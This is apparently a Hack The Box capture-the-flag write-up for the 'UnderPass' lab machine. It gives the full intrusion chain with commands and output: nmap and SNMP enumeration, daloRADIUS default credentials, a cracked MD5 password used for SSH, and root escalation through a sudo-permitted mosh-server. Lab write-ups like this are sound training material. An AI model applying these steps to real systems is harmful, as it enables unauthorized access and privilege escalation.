🔞UnderPass

https://app.hackthebox.com/machines/UnderPass

Recon

Nmap-Scan

➜  UnderPass sudo nmap -vv -sV -sC 10.10.11.48
..
PORT   STATE SERVICE REASON         VERSION 
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK+kvbyNUglQLkP2Bp7QVhfp7EnRWMHVtM7xtxk34WU5s+lYksJ07/lmMpJN/bwey1SVpG0FAgL0C/+2r71XUEo=
|   256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ8XNCLFSIxMNibmm+q7mFtNDYzoGAJ/vDNa6MUjfU91
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:                      
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Website

As the scan already reveals we got a Apache2 Default Page

Nmap Udp-scan

➜  UnderPass sudo nmap -sU -p 53,67,68,123,161,500 -T4 underpass.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-26 18:17 CEST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.020s latency).

PORT    STATE  SERVICE
53/udp  closed domain
67/udp  closed dhcps
68/udp  closed dhcpc
123/udp closed ntp
161/udp open   snmp
500/udp closed isakmp

Nmap done: 1 IP address (1 host up) scanned in 2.65 seconds

Snmp

We find a user steve@underpass.htb with snmpbulkwalk and daloradius server

➜  UnderPass snmpbulkwalk -c public -v2c underpass.htb                      
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (137556) 0:22:55.56
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"

[...]

User

Dolaradius-Server

Checking the Website we are getting a 403

Doing a dirscan using feroxbuster(alias function)

➜  UnderPass htbferox http://underpass.htb/daloradius      
[...]
Scanning: http://underpass.htb/daloradius/library/                                                                                                                                                                                          
Scanning: http://underpass.htb/daloradius/doc/
Scanning: http://underpass.htb/daloradius/app/
Scanning: http://underpass.htb/daloradius/contrib/
Scanning: http://underpass.htb/daloradius/setup/
Scanning: http://underpass.htb/daloradius/app/common/
Scanning: http://underpass.htb/daloradius/app/users/
Scanning: http://underpass.htb/daloradius/contrib/scripts/
Scanning: http://underpass.htb/daloradius/doc/install/
Scanning: http://underpass.htb/daloradius/contrib/db/
Scanning: http://underpass.htb/daloradius/app/operators/
Scanning: http://underpass.htb/daloradius/contrib/heartbeat/

Default Creds for daloradius

The config reveals the db user and password

We find a password hash at the user management panel

Crackstation gives us the answer for this md5 hash underwaterfriends

➜  UnderPass ssh svcMosh@underpass.htb
svcMosh@underpass.htb's password: underwaterfriends
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Apr 27 06:51:18 PM UTC 2025

  System load:  0.0               Processes:             228
  Usage of /:   61.4% of 6.56GB   Users logged in:       1
  Memory usage: 18%               IPv4 address for eth0: 10.10.11.48
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Apr 27 17:11:04 2025 from 10.10.14.3
svcMosh@underpass:~$

Root

svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
svcMosh@underpass:~$ sudo /usr/bin/mosh-server


MOSH CONNECT 60001 OK0hsbEH9M4WGDo+g8Lb9g

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 6802]
svcMosh@underpass:~$ MOSH_KEY=OK0hsbEH9M4WGDo+g8Lb9g mosh-client 127.0.0.1 60001

Last updated